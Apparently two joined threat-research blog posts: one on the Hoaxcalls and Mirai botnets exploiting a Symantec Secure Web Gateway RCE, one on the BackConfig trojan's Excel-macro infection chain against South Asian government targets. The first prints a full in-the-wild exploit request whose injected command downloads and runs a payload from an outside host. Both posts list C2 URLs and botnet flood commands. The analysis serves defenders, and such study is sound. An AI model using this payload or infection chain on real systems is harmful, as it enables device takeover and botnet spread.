The first instance of this vulnerability being exploited surfaced on April 24th, 2020 as part of an evolution of the Hoaxcalls botnet that was first discovered earlier that same month. This latest version of Hoaxcalls supports additional commands that allow an attacker greater control on the infected devices, such as the possibility to proxy traffic through them, downloading updates, maintaining persistence across device restarts, or preventing reboots, and a larger number of DDoS attacks that can be launched. The use of the exploit in the wild surfaced only a few days after the publication of the vulnerability details, highlighting the fact that the authors of this particular botnet have been pretty active in testing the effectiveness of new exploits as and when they are made public.

Following that, in the first week of May, I also came across a Mirai variant campaign involving the use of the same exploit, though in this campaign, the samples themselves don’t contain any DDoS capabilities. Instead, they serve the purpose of propagation using credential brute force and exploitation of the Symantec Secure Web Gateway RCE vulnerability This blog post provides any noteworthy technical details on these two campaigns.

Palo Alto Networks customers are protected from this attack: WildFire correctly identifies all related samples as malicious and Threat Prevention blocks all exploits used by this variant. In addition, AutoFocus customers can track this exploit using the tag SymantecWebGateway_RCE.

Hoaxcalls Evolution

The Hoaxcalls botnet, an offshoot of the Bashlite/Gafgyt malware family, was first discovered in April 2020, exploiting recently disclosed vulnerabilities in certain models of Grandstream business telephone IP PBX systems, and Draytek Vigor routers.

A few weeks later, the botnet was found exploiting an unpatched vulnerability impacting Zyxel Cloud CNM SecuManager.

On April 24th, I observed samples of the same botnet incorporating an exploit targeting the EOL’d Symantec Secure Web Gateway v5.0.2.8, with an HTTP request in the format:

POST /spywall/timeConfig.php HTTP/1.1

User-Agent: XTC

posttime=1585228657&saveForm=Save&timesync=1&ntpserver=http://qweqwe.com;$(wget%20http://plexle.us/Th5xrRAm%20-O%20/tmp/viktor%20&&%20chmod%20777%20/tmp/viktor%20&&%20/tmp/viktor);#&timezone=5

As seen in the snippet above, some samples reach out to a URL for a public file upload service (plexle[.]us) where the post-exploitation payload is hosted.

A comprehensive list of indicators of compromise (IOCs), along with a timeline of this activity can be found at the end of this post.

While the new version of the Hoaxcalls botnet is very similar to the initial version, to the point that it even uses the same encryption scheme with the exact same keys, it supports additional commands that allow an attacker greater control on the infected devices such as the possibility to proxy traffic through them, downloading updates, maintaining persistence across device restarts or preventing reboots, and a larger number of DDoS attacks that can be launched. These have been detailed below.

Flooder Commands Description
SYMANTEC scan and infect Symantec Secure Web Gateway devices using the RCE described just above.
FASTFLUX proxy traffic from the device to an address specified by the attacker
UNINSTALL kill the running malware process
KILLTELNET kill the telnet service on the device (this is probably to make maintenance of an infected device trickier for administrators)
LOCKDEVICE setup a cronjob to ensure the binary is running and maintain persistence across device restarts
UPDATE delete the existing bot binary, and download an update from 164[.]132.92.180/sh using either wget or tftp (The update URL was serving a script as seen in Fig 1 below)
MOVE switch IRC server
IOCTL disable the watchdog timer to prevent reboots
HTTPCONN launch HTTP CONNECTION request flood against specified target
HTTPOPTIONS launch HTTP OPTIONS request flood against specified target
HTTPTRACE launch HTTP TRACE request flood against specified target
HTTPDELETE launch HTTP DELETE request flood against specified target
HTTPPUT launch HTTP PUT request flood against specified target
HTTPPOST launch HTTP POST request flood against specified target
HTTPHEAD launch HTTP HEAD request flood against specified target
HTTPGET launch HTTP GET request flood against specified target
URG launch URG flood against specified target
PSH launch PSH flood against specified target
ACK launch ACK flood against specified target
FIN launch FIN flood against specified target
RST launch RST flood against specified target
SYN launch SYN flood against specified target
TCP launch TCP flood against specified target
VSE launch VSE flood against specified target

Table 1. New Flooder commands

The URL contacted for the update serves a shell script that downloads and executes binaries from attacker-controlled URLs.

Fig 1. Hoaxcalls update URL

Other bot and flooder commands in common with the previous version of the Hoaxcalls botnet have been described in detail previously.

Mirai Variant

Samples of this campaign surfaced early May, built on the Mirai source code, and are packed with a modified version of UPX by using a different 4-byte key with the UPX algorithm.

Another deviation from the Mirai source-code is the use of all of ten 8-byte keys that are cumulatively used for a byte-wise string encryption scheme.

     0xDEADBEEF, 0x85DAB8BF, 0xDEEDEEBF, 0xDEABBEAF, 0xDBBD45BF, 0x246584EF, 0x85BFE8BF, 0xD68395BF, 0xDBAAAAAF, 0x0DAABEEF

This is similar to the scheme used by the Hoaxcalls botnet, and has been seen used in previous variants too. However, as has been clear with previous implementations too, the use of multiple keys does not imply greater encryption complexity, and in this case this essentially amounts to a byte-wise XOR encryption with 0x5a.

In this campaign, the samples themselves don’t contain any DDoS capabilities, but rather serve the purpose of propagation using credential brute force and exploitation of the Symantec Secure Web Gateway RCE vulnerability.

Speculation on Exploitation Success

It is worth mentioning that the botnets’ success at exploitation and infection is limited by the following two facts:

  1. The Symantec Secure Web Gateway RCE vulnerability being exploited is a post-authentication vulnerability implying the exploit is only effective for authenticated sessions.
  2. The devices being targeted are EOLDproducts from 2012, and installations with newer firmware would not be vulnerable.

Conclusion

In the case of both campaigns, one can assume that their success with this exploit is limited by the post-authentication nature of the Symantec Secure Web Gateway RCE vulnerability.

Palo Alto Networks customers are protected by:

  • WildFire, which detects all related samples with malicious verdicts
  • Threat Prevention, which blocks all exploits used by this variant.

The exploit can be tracked in AutoFocus using the tag SymantecWebGateway_RCE

Palo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit www.cyberthreatalliance.org.

Indicators of Compromise

First Seen SHA256 URL
2020-05-07 1cec4576595048a179bf8c21b58f33ef61ae1825b2b3f0a86915a741a04f253f 45[.]95.168.250/swrgiuhguhwrguiwetu/arm
2020-05-07 a31187ed8545789ff2979037e19e1ca18d35a75820a1ec91053782f30c47ecc5 45[.]95.168.250/swrgiuhguhwrguiwetu/arm5
2020-05-07 ef5d39a3fa641b4d55d870437a9ba774eefcfa2c69066dd0a6fbe513a4b7a8f2 45[.]95.168.250/swrgiuhguhwrguiwetu/arm6
2020-05-07 04e8356bdc8782cf03acc9f69ff6fa9dfde7378dcd1fe0dc737d13fd4d7e061e 45[.]95.168.250/swrgiuhguhwrguiwetu/arm7
2020-05-07 60f755288c9d3110d2fe5d872b2c045156dcea4be9a5cc918bddf1e786881842 45[.]95.168.250/swrgiuhguhwrguiwetu/m68k
2020-05-07 0e531e105aa3419cd19e95fa9d44f6176157002a09444a1e5465657d743180ac 45[.]95.168.250/swrgiuhguhwrguiwetu/mips
2020-05-07 02dc186a39607475838bb4859f89e7a200f74fed41400ab5db4eb42d3f58f772 45[.]95.168.250/swrgiuhguhwrguiwetu/mpsl
2020-05-07 72675ccf2d4e0d0aac2f5121a6a80ea1efc4f30b22e64b07bd891438de2bf82a 45[.]95.168.250/swrgiuhguhwrguiwetu/ppc
2020-05-07 0a48cc158a07e13bd76ac941c4523692530f836d69256b02a10052248263d781 45[.]95.168.250/swrgiuhguhwrguiwetu/sh4
2020-05-07 37dfde696632295e806924de3d3ab751404e2a968e063a12ce72eb2e3ce0b984 45[.]95.168.250/swrgiuhguhwrguiwetu/x86
2020-05-02 da84fd43cb8701c4e23dd0a4175ebccebda026ca2f47b7b1bad393205075389f 164[.]132.92.180/arm4
2020-05-02 287645a5a29a39ef94aa0cdebdbd3cb4ad2a45ead8894fc323a5a2a76a7fdb0d 164[.]132.92.180/arm5
2020-05-02 4a4316178e85e0d4c94d74af9f2258c045194cf7a4f4a83a90abf5db09fbaa04 164[.]132.92.180/i586
2020-05-02 38290965b2cd8048b3ef076487b99dfbeef457f6f6f9998b95ff922e160a5113 164[.]132.92.180/i486
2020-05-02 25d1c51135dca20f4f7a720f237d9186edde2a2a664ede6bef37e843e7be409c 164[.]132.92.180/i686
2020-05-02 012d49c6e847f2f75983b46a9a1310dac29b5f8d30b665ae2124d8619b80753b 164[.]132.92.180/m68k
2020-05-02 763dfa5f391d27e65be6682c2e58c888df309fa2732781db312f5c9b10e6d5a1 164[.]132.92.180/mips
2020-05-02 ad1156e6ad91b02f225d82d96000cf9abf671a305e8c5c61229d69dbed5050ba 164[.]132.92.180/mips64
2020-05-02 28f31eb4b1fd3b7e742f5043a26b383585317d16bbfdae0296e18b90dcbec29b 164[.]132.92.180/ppc440
2020-05-02 5d8756118b7e017eb4f4c5da4236191b20a5c8cb96abb76c26f0e918a76bd973 164[.]132.92.180/mpsl
2020-05-02 1f64287ae9ea968017b3615f2b5b51932d7eeb3f0ee6621f74ae29af8f1a27d5 164[.]132.92.180/sh4
2020-05-02 65a8ea32f77c2d18325d49d0cc32a4bbf893a2f106e77e8a8670191c71b456a9 164[.]132.92.180/spc
2020-05-02 2b0854d40d8ffdca886f4540156b7addc4245de5df197e39ce198b9cf098944a 164[.]132.92.180/arm6
2020-05-02 43ce5e4fb95b57fa2921d718e989107a594d5287b5bbbcb3e9bff262a982e815 164[.]132.92.180/ppc
2020-05-02 3d6be7b9bd4798000230e354a5777601ca6672c8d84af842469ddeb1681ed7f2 164[.]132.92.180/arm7
2020-05-02 e0141934100df75d6b0c61858fc4cc44f97ce2a2588aa5d042f965f9542b843b 164[.]132.92.180/x86
2020-05-01 85f397e052950f736b32f0463dce7a1458ed034bec57284ea83d2ee4788f8a82 164[.]132.92.180/x86
2020-05-01 b39763036951bb373e1389362c4de6c4cbd3af3757dbb66d53fceb69de02677f 164[.]132.92.180/arm7
2020-05-01 6d76fd0bb5ba2d1c19f64288bb4b20eb136171aa8ea1afb685d2e363911aab2f 164[.]132.92.180/arm6
2020-05-01 5415ce3e759bcc3a8a163a84b64a7185f6540d4ec0ff07627ac770fd0ef0244d 164[.]132.92.180/arm5
2020-05-01 b52f8ff49e172a3e41ec60010c4089e3534ad1f0582a7ee04c4aa58c34db21ca 164[.]132.92.180/arm4
2020-05-01 e248445c39cac693fc2a921e41879fb80286f418c352d7a9d428d6181fe113a3 164[.]132.92.180/mpsl
2020-05-01 a3e2d3536d3facd3d825949addd7e99152b5df395b26e41e04b16be0a8cf4d85 164[.]132.92.180/mips
2020-04-27 82e5e0f6c130a3f0424cf33468f5ec7a3a66d14f5d346196d1b604ecd2b1e6a3 164[.]132.92.180/x86
2020-04-27 fa1bc69c9eccaaa4b8131856f9e69837f10dfa1236a65e0a8954d297c2a465bd 164[.]132.92.180/arm4
2020-04-26 233d4f6ee9f0ffb52b88de0218a0a4b04e3b20c5440e6414255d644ef696d190
2020-04-24 81e9a4b8f8a7d06d871488d9c869bde54a83ff7fe33d652ed58c10109b9830ee plexle[.]us/Th5xrRAm
2020-04-24 e15eeeaeb0ac0639bf3491ba8801e30516e085047f2d787397966065bdf9d5e7
2020-04-24 5916171938fba2d218de38c8b1f484345bc62d436b7b501ef986ae06c133b13d
2020-04-24 970496ac754ce7573216950a9904bdfc75574b4c0605e1d62364be799b9c813b
2020-04-24 735beaa92e7d697a521c7ed5292b3e8100c29a2af88f1a1b99abf0a1bc5ab5c8 164[.]132.92.180/i686
2020-04-24 84e017a59f9f7d7d5fde40bc2867a1e9d6ec6fae63b3e21685b3bb7166357531 164[.]132.92.180/arm7
2020-04-24 81e9a4b8f8a7d06d871488d9c869bde54a83ff7fe33d652ed58c10109b9830ee
2020-04-24 9ce642628cec8de80d2186d5d7f020635180326ed9e33cabde46d6c9b2caba1b
2020-04-24 20c3f1bbf4ae4733c6e01eb4f82a251bcb5b0ae0bd5f1b1a028b7ff65ea779af
2020-04-24 ddab987e986f76fcc36af92a6ea15439dd36253d91c0c3cddd77b2b9fd9ff395
2020-04-24 7bca6fcc70d14253803780e80ee57b29814adeae1af993374f919a1017f5b0f5

 

 

Updated BackConfig Malware Targeting Government and Military Organizations in South Asia

Posted on by Alex Hinchliffe

Executive Summary

Unit 42 has observed activity over the last 4 months involving the BackConfig malware used by the Hangover threat group (aka Neon, Viceroy Tiger, MONSOON). Targets of the spear-phishing attacks, using local and topical lures, included government and military organizations in South Asia.

The BackConfig custom trojan has a flexible plug-in architecture for components offering various features, including the ability to gather system and keylog information and to upload and execute additional payloads.

The initial infection occurs via a weaponized Microsoft Excel (XLS) document delivered via compromised legitimate websites for which the URLs are most likely shared via email. The documents use Visual Basic for Applications (VBA) Macro code which, if enabled by the victim, starts an installation process consisting of multiple components that result in the plug-in loader payload being downloaded and executed. The modular nature certainly allows for quicker changes to individual components and, perhaps more importantly for the attackers, splits up the malicious behaviors in such a way that could thwart sandbox and dynamic analysis systems, especially when analyzing the components in isolation.

Our threat prevention platform with WildFire detects activity associated with this threat group, while simultaneously updating the ‘malware’ category within the PAN-DB URL filtering solution for malicious and/or compromised domains that have been identified.

Indicators of compromise related to this research are documented at the end of this report and in the Adversary Playbook for the Hangover threat group that can be accessed in the Unit 42 Playbook Viewer.

Starting Point

Unit 42 first saw activity involving the Windows PE executable file (SHA256: 84e56294b260b9024917c390be21121e927f414965a7a9db7ed7603e29b0d69c) when searching AutoFocus data related to particular sectors and countries of interest.

The file was first seen on January 19th, 2020, having been downloaded by two organizations -- a government department in one country and a military organization in another -- within minutes of each other. The source of the download was http://212.114.52[.]148/request/httpsrequest and the file httpsrequest was stored locally as dphc.exe. More details on how the malware was delivered are described later in the blog.

The choice of terminology in URL paths and file names when delivering BackConfig malware in this, and other campaigns discussed later on, is clearly to blend in as benign operations, paths and filenames. Although spelled differently, it could be easy to believe the payload relates to the DHCP networking service.

The purpose of this malware is to allow the actors to download and execute an executable file, as well as download and run batch files to run commands on the end system.

This sample has a custom "decryption" routine that subtracts six from each character. The following strings are decrypted using this method:

    • linkrequest[.]live
    • \\Adobe\\Driver\\dwg\\pid.txt
    • \\Adobe\\Driver\\dwg\\
    • \\Adobe\\Driver\\dwg\\wuaupdt.exe

The Trojan reads the following file to use in the URL of the C2 beacon. If the file does not exist, the executable will exit without performing any further activities. The pid.txt file is created during the earlier delivery and installation phases starting with the weaponized Excel document. More information about this setup process is covered later in the delivery section. As previously mentioned, this behavior makes an automated analysis of the individual executable payload component harder.

    • %USERPROFILE%\Adobe\Driver\dwg\pid.txt

The C2 channel uses HTTPS thanks to the INTERNET_FLAG_SECURE flag used when calling the HttpOpenRequestA function. The beacon HTTP request will look like the following:

GET /orderme/[contents of pid.txt file] HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0 @/NEW
Host: linkrequest[.]live [resolving to 23.106.123[.]87]

The Trojan will look for the following field and values within the HTTP response header:

    • "Content-Type: application"
    • "Content-Type: xDvsds"
    • "Content-Type: Bw11eW"

If the content-type field contains a value of application, the Trojan will extract a filename from the HTTP response headers between the string filename and Content-Transfer-Encoding. It will use this filename to create a file in the %USERPROFILE%\Adobe\Driver\dwg\ folder, which it will write the data in the HTTP response to. Based on the other two Content-Types, we believe the filename provided will be either "wuaupdt.exe" or test.bat.

If the content-type field has a value of xDvsds, the Trojan will attempt to execute the following file using ShellExecuteA and the "open" method:

%USERPROFILE%\Adobe\Driver\dwg\wuaupdt.exe

If the content-type field has a value of Bw11eW, the Trojan will attempt to execute the following file using ShellExecuteA and the "open" method:

%USERPROFILE%\Adobe\Driver\dwg\test.bat

At the time of writing, the C2 appeared inoperational and no further payloads were seen. We believe that the resultant wuaupdt.exe file would then provide further capabilities to steal information, log keystrokes, and provide the ability to run additional commands either directly or via additional plugins which it would download, as documented by the Qihoo 360 Threat Intelligence group in their investigation of prior campaigns here.

Unit 42 has conducted cursory binary diffing for many of the BackConfig executable files and did not find any non-library function overlaps that would suggest that the payloads are based on the YTY or EHDev frameworks as mentioned here and here.

PE Metadata

The malware sample contains some interesting static artifacts including self-signed digital certificates used to sign the executable purporting to be software from the Foxit Software Incorporated company based in California. It is not known why the actors picked this company -- and others listed in Table 1 below -- to impersonate but, as previously mentioned, their use of filenames and URLs makes their payloads appear benign and trustworthy.

Using this meta-data, together with information gleaned from infrastructure investigation, Unit 42 were able to pivot around on AutoFocus data to find additional BackConfig PE executable samples. Those samples from the last 12 months are listed in Tables 1 and 2 below.

SHA256 Compilation Time (UTC) First Seen (Pacific) Signer Name
84e5629... 01/20/2020 7:26:09am 01/19/2020 11:49:03pm Foxit Software Incorporated
18ce3ee... 10/10/2019 9:22:11am 01/16/2020 4:30:26pm
4a4bc01... 11/21/2019 9:19:49am 01/16/2020 1:31:46am wind0ws
91c67c1... 11/21/2019 9:19:49am 12/02/2019 2:03:41am
de5b670... 11/21/2019 9:19:49am 11/21/2019 11:59:05pm
f79ebf0... 10/28/2019 5:35:26am 11/09/2019 10:32:09pm NVIDIA Corporation
31faeef... 10/10/2019 9:22:11am 10/13/2019 10:11:04pm Foxit Software Incorporated
d87b875... 09/12/2019 5:54:04am 09/26/2019 9:32:19am Digicert Global
1510996... 12/05/2018 4:35:03am 04/09/2019 10:30:16am Foxit Software Incorporated

Table 1. Describing PE compile times and Digital signatures used, ordered by first seen.

The Compilation Time stored in executable (SHA256: 84e5629...) appears to be after the point at which the file was first seen by our WildFire analysis system. While the PE file timestamp could be modified post-compilation, the oddity is more likely explained away with time zones -- 2349 Pacific time on the 19th is 1349 in Bangladesh on the 20th, and 7:26am UTC is in the range of 11:26 to 13:26 across the South Asia region, which would make the sample compilation quite recent with respect to the delivery of it.

More details about the self-signed digital certificates, as well as full hashes, can be found in the IOCs section at the end of this report.

The following table shows the version information from the same PE files, grouped by similar File Description fields. The order remains the same, except for the sample (SHA256: 18ce3ee...) which was first seen January 16th, 2020 but for some reason reverted to using exact version information seen in samples two to three months prior. Namely, Link Finder.

SHA256 File Description File Version Product Name Product Version Copyright
84e5629... Альберт (Albert, in English) 06.10.2015 Альберт 01.05.2015 Copyright @ 2015-2026 secosec
4a4bc01... Ссылка

(Link, in English)

 01.01.12 ссылка 10.01.2015 Copyright @ 2011-2021 secosec Inc. Все права защищеныk (All rights reserved, in English)
91c67c1...
de5b670...
18ce3ee... Link Finder 01.01.12 Link Finder 13,9,1632 Copyright @2011-2020 Techtest Inc. All Rights Reserved
f79ebf0...
31faeef...
d87b875... scrapper 01.12.001 scrapper 13,6,1662 Copyright @Scrapper Ltd Reserved
1510996... system process 2,1,1,2015 system process cleaner 2,1,1,2015 Copyright © 2004-2018 Foxit Software Inc. All Rights Reserved

Table 2. Describing PE version info metadata, ordered by first seen and grouped on matching data.

Of the set, the file (SHA256: 1510996...) has most consistency in terms of a theme, using the Foxit Copyright information, self-signed digital signature and even using the company logo, as shown in the Figure below, for the executable file’s icon. The file’s copyright information only differs from that of Foxit’s Reader software by a missing period symbol, implying it was copied rather than created.

The actors then moved to use seemingly fictitious company and product names while using a mixture of signer names in their digital signatures. No file icons were used at all over the last 11 months.

Recent samples also included Cyrillic text in the file description, product name, and copyright fields, as shown and translated in the table above. It’s hard to know if this is an attempt to set false flags as to the origins of the BackConfig malware, or perhaps to make the content more relevant to specific targets within the victim organizations.

Delivery and Installation

In this section, we describe how the various payloads are delivered based on what we have seen in our customer networks, as well as what we have established through open-source research. Unit 42 has yet to see any evidence of weaponized documents used to deliver BackConfig being attached on phishing emails and that phishing URL links in emails appear to be the Hangover group’s modus operandi.

The remainder of this section focuses largely on Object Linking and Embedding (OLE) Microsoft Excel documents, as they are most commonly used by the Hangover group, at least when it comes to the BackConfig malware. Through infrastructure analysis however, Unit 42 was able to find a BackConfig PE sample (SHA256: e28f1bc0b0910757b25b2146ad02798ee6b206a5fe66ce68a28f4ab1538d6a1f; first seen 10/24/2019) using the C2 domain matissues[.]com and dropped by the weaponised Rich Text Format (RTF) file (SHA256: 752c173555edb49a2e1f18141859f22e39155f33f78ea70a3fbe9e2599af3d3f) from the same day. The RTF used the CVE-2017-11882 exploit against equation editor vulnerabilities in Office applications to execute the PE sample which was a unique exploitation method compared to all other samples analyzed.

Compromised Third-Party Infrastructure

Continuing to pivot on data obtained from the samples found thus far, we discovered some related URLs relating to compromised third-party infrastructure supporting the delivery of the BackConfig malware. The following table lists some examples of compromised sites delivering weaponised XLS files with filenames, such as Circular_No_03.xls (SHA256: 0aa5cf1025be21b18ab12d8f8d61a6fa499b3bbcdbdced27db82209b81821caf) and Circullar_Nov_2017.xls (SHA256: ed638b5f33d8cee8f99d87aa51858a0a064ca2e6d59c6acfdf28d4014d145acb) implying (even with incorrect spelling) that the contents is, or relates to, a letter or advertisement which is distributed to a large number of people.

SHA-256 First Seen Related URL Description Location
be3f12b... 2019-10 http://nsaimmigration[.]com/userfiles/image/

fbr.php and nphp_registration_form.php (both HTTP 404)

 Consultant and Legal Advice company supporting students to live and study abroad. Pakistan
0aa5cf1... 2018-09 http://webtechhub[.]com/wordpress/wp-content/images/fbr_circular.php Web design and dev site running outdated WordPress application Pakistan
ed638b5... 2017-11 http://alphamike.com[.]mv/housing Shipping agency for freight forwarding and cargo delivery. Maldives
http://mgamphs.edu[.]bd/info/ (down) Muhurigonj Academy of Music and Performance High School. Reference. Bangladesh

Table 3. Compromised third-party infrastructure to support delivery of BackConfig.

Given the targeting related to these threats, and the compromised third-party websites, we believe the use of “fbr” in some of the URLs above likely relates to the Federal Board of Revenue (FBR) government organization of Pakistan. The “fbr” theme also runs into the VBA macro code. File ed638b5... contains the statement Const WelcomePage = "FBR".

The old compromised hosting examples in Table 3 above do not rely on Hypertext Preprocessor (PHP) server-side scripts to deliver the weaponized XLS files. Instead, the pages simply used HTTP response status 301 (Moved Permanently) for URL redirection to said XLS, initiating the download. More recent examples make use of PHP with URL filenames matching the social engineering theme, such as “fbr”. In addition, the actors use the PHP script to log any visitors to the page noting in a file named “info.txt” the datetime stamp of the event, the client operating system, and their IP address.

The location of the compromised third-party infrastructure or the organizations legitimately using them, align with the targeting Unit 42 has seen. This could be pure coincidence, a sign from the threat actors that their intention is to take advantage of weaknesses in the target country’s wider infrastructure, or the threat actors leveraging in-country infrastructure that may be considered more trustworthy by the intended victims and their security solutions.

Palo Alto Networks’ WildFire sandbox analyzed sample ed638b5... on November 8th, 2017, and, as described in the table above, the sample was hosted on two compromised websites: a Bangladesh school and a Maldivan shipping agency. While Unit 42 has not seen Hangover activity in the Maldives, the archipelago is in the region alongside other known targets and interestingly, swore in a new President about a week after Unit 42 analyzed the sample.

The EXE payload (SHA256: 4104a871e03f312446ef2fb041077167a9c6679f48d48825cbc1584e4fa792cd) downloaded directly by the VBA code in sample ed638b5... from the URL below relates to those documented by BitDefender here. To date, Unit 42 has only seen 6 similar samples since the late-2017 timeframe for this sample, compared to many more prior, perhaps indicating a change over of the custom payloads used by the Hangover group. Certainly, there are some overlaping Tactics Techniques and Procedures (TTPs) between the older samples and the more recent BackConfig samples.

http://chancetowin.quezknal[.]net/appstore/updatepatch/logs.exe

Evolution of Delivery Payloads

Before moving on to describe the most recent samples and installation methods used by the Hangover actors, the timeline figure below provides a high-level view of the evolution in TTPs used.

Figure 2. Evolution of delivery payloads

Despite the evolution over the years, some habits are hard to break. Firstly, every weaponized XLS Unit 42 has investigated loads a fake error message, such as the one shown in Figure 3 below, to trick the victim into thinking that the file is corrupt and thus nothing has -- or will -- load as intended. Another fictitious error message text has been used in the past often with poor spelling or grammar.

Figure 3. Example fake error message displayed to the victim.

Similarly, the version information metadata stored in all the Excel documents analyzed share the same Author and Last Modified By names - Testing.

The following subsections describe the campaigns and malware as highlighted by the three most recent milestones in the timeline figure above.

2019 Milestone: Multi-Component

Registration Form.xls (SHA256: be3f12bcc467808c8cc30a784765df1b3abe3e7a426fda594edbc7191bbda461) listed in Table 3 above provides an example of the types of lures used by the threat actors.

Upon opening the XLS and enabling the macro code, the picture in Figure 4 below is shown on top white-background cells. As the filename suggests, it’s a registration form and relates to the Naya Pakistan Housing program run by the Pakistani government to help solve the housing shortfall in the country. Eligible citizens include government employees and registration forms were due by October 15th, 2019 (extended through November 15th), meaning the timing and the lure of the campaign on October 25th were clearly planned to increase the chances of compromise.

Figure 4. Social engineering lure against Pakistan government in October 2019

As the PHP webpages did not exist at the time of writing, Unit 42 cannot prove the XLS file be3f12b... was hosted at the URL listed in row 1 of Table 3 above. However, because of the following points, we have high confidence in the campaign relationship between the two.

    1. AutoFocus and VirusTotal first processed the XLS file be3f12b... on October 25th, 2019
    2. VirusTotal processed the nsaimmigration... URL on the same day
    3. A specific HTTP GET request URL using the notation nphp_registration_form.php?r= was processed in VirusTotal on the same day, and has relations to http://185.203.119[.]184/fin_div/session, which matches the IP address and URL structure in the VBS code dropped by the XLS be3f12b....
    4. The name of the PHP webpage nphp_registration_form.php relates to the filename of the XLS.

The VBA macro code in the XLS file be3f12b... differed somewhat from that of the samples of the previous years. Instead of directly storing encoded EXE files or running batch shell commands directly from the VBA code itself, it retrieved the content from hidden columns in the Excel sheet, starting at column 27 or “AA”, which is likely to be off-screen for most people. Once the font colour was changed, the “setup” batch code component as per previous variants, and the new Visual Basic Script (VBS) downloader component were revealed in columns AA and AB, respectively, as shown in figure 5 below.

Figure 5. VBS downloader and BAT setup file revealed in the XLS sheet.

Macro VBA code in the XLS parses the content of the two columns line by line writing the contents to their respective files on disk and executing them following the same process flow as described below in Figure 6.

2019 Milestone: BITS and ZIPs

A more recent weaponized XLS file (SHA256: 021b030981a6db1ec90ccbd6d20ee66b554b7d8c611476e63426a9288d5ce68b) was analyzed by WildFire on November 15th, 2019 and exposed some new techniques. On this occasion, the VBA macro code contained a decimal-encoded ZIP file of only 1,062 bytes in size. Inside the ZIP archive were two text files that would be decompressed to a folder driverkit. One file, driverkit.bat, is the “setup” BAT file already discussed in this report and listed in the appendix section. The other file, Winmgt.txt, is an adaptation of the VBS downloaded also described in this report. However, instead of a direct HTTP download using an MSXML DOM object, this version writes the following contents to Winmgt_Drive.bat, which is executed by a third scheduled task created by the “setup” BAT file.

2020 Milestone: Fine Tuning

The following execution flow diagram is based on one of the most recent weaponized documents Unit 42 has seen Invoice.xls (SHA256: 8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83c; first seen 2020-01-15).

The infection process consists of multiple components as just described. The “setup” batch (BAT) file coordinates much of the infection process of the BackConfig plug-in loader once the VBA has written it to disk and executed it.

Figure 6. Execution flow of BackConfig malware

The numbered bullet list below describes Figure 6.

    1. Text file Drive.txt (SHA-256: 4f75622c2dd839fb5db7e37fb0528e38c4eb107690f51f00b5331e863dc645d1) is created and contains the decimal-decoded VBS content.
    2. Similarly, the VBA code then writes batch code to another text file - Audio.txt. The content of both files is shown in the appendix section of this report.
    3. Audio.txt is renamed to Audio.bat and executed.
    4. Audio.bat cleans up any files and folders related to previous infections, and recreates the required environment including creating the aforementioned pid.txt file, and setting various folders and files to be hidden from a default Windows Explorer view. The contents of pid.txt is the victim’s computer name concatenated with a hyphen followed by a random number, although I believe the code used would not work as intended.
    5. Audio.bat continues by creating two scheduled tasks referencing two files that are yet to exist: dphc.exe will run every 10 minutes and Drive.vbs at 20 minute intervals.
    6. Finally, before deleting itself, Audio.bat will rename Drive.txt to Drive.vbs. When Drive.vbs is eventually executed by the task scheduler, it will download the BackConfig executable payload. In the case of file 8892279f3... the remote location is http://185.203.119[.]184/Dropbox/request.
    7. When dphc.exe is eventually executed by the task scheduler, it first checks for the presence of pid.txt (step 4.) and only continues if the file exists.

Ultimately, the XLS writes two files to disk, one of which -- the BAT -- immediately modifies some system settings and creates two scheduled tasks. However, this behaviour may not be enough to determine the components as malicious. Only after 20 minutes will the task scheduler execute the VBS downloader component and launch the BackConfig loader EXE, by which time analysis systems may have stopped monitoring.

ATT&CK

The following table describes the TTPs associated with the multiple campaigns described in this report.

Tactic Technique (Mitre ATT&CK ID)
Technical Information Gathering Acquire OSINT data sets and information (T1247)
Conduct social engineering (T1249)
Adversary Opsec Compromise 3rd party infrastructure to support delivery (T1312)
Build Capabilities Create custom payloads (T1345)
Obtain/re-use payloads (T1346)
Stage Capabilities Upload, install, and configure software/tools (T1362)
Initial Compromise Spear Phishing Link (T1192)
Execution User Execution (T1204)
Exploitation for Client Execution (T1203)
Execution, Persistence Scheduled Task (T1053)
Defense Evasion Code Signing (T1116)
Deobfuscate/Decode Files or Information (T1140)
Hidden Files and Directories (T1158)
Obfuscated Files or Information (T1027)
Defense Evasion, Execution Scripting (T1064)
Defense Evasion, Persistence BITS Jobs (T1197)
Command & Control Commonly Used Port (T1043)
Standard Application Layer Protocol (T1071)
Standard Cryptographic Protocol (T1032)
Remote File Copy (T1105)

Conclusion

The Hangover group (aka Neon, Viceroy Tiger, MONSOON) is active and targeting, according to Unit 42’s visibility, government and military organisations in South Asia using spear-phishing emails containing letters or government forms to lure victims into browsing to compromised websites serving weaponized Excel documents that install the BackConfig Trojan. Almost exclusively, Unit 42 has seen the use of weaponized documents that require user execution. Only once in the last six months have we seen use of exploits to circumvent the need for the user to execute any part of the installation chain.

The evolution of BackConfig’s primary and secondary payloads has seen different methods used for executing commands and deploying executables both with and without obfuscation.

The latest versions contain modular components making it easier to update and re-use code in order to rapidly deploy their campaigns in a timely manner to have the highest chance of success. The method in which the latest samples execute also indicates the group’s focus on trying to evade sandbox and other automated analysis systems by breaking down malicious activity into chunks that each seem relatively benign.

Protections:

Cortex XDR protects endpoints from all malware, exploits and fileless attacks associated with Hangover actors.
WildFire® cloud-based threat analysis service accurately identifies samples associated with these malware families.
Threat Prevention provides protection against the known client and server-side vulnerability exploits, malware, and command and control infrastructure used by these actors.
URL Filtering identifies all phishing and malware domains associated with these actors and proactively flags new infrastructure associated with these actors before it is weaponized.
Users of AutoFocus™ contextual threat intelligence service can view malware associated with these attacks using the following tags:

More information about the Hangover group and the BackConfig malware can be found in AutoFocus.

Palo Alto Networks has shared our findings, including file samples and indicators of compromise, in this report with our fellow Cyber Threat Alliance members. CTA members use this intelligence to rapidly deploy protections to their customers and to systematically disrupt malicious cyber actors. For more information on the Cyber Threat Alliance, visit www.cyberthreatalliance.org. (This is added to blogs pre-shared with the CTA, when loaded into WordPress it will be added when appropriate).

Indicators of Compromise

Delivery Documents

56349cf3188a36429c207d425dd92d8d57553b1f43648914b44965de2bd63dd6
8892279f3d87bcd44d8f9ac1af7e6da0cfc7cf1731b531056e24e98510bea83c
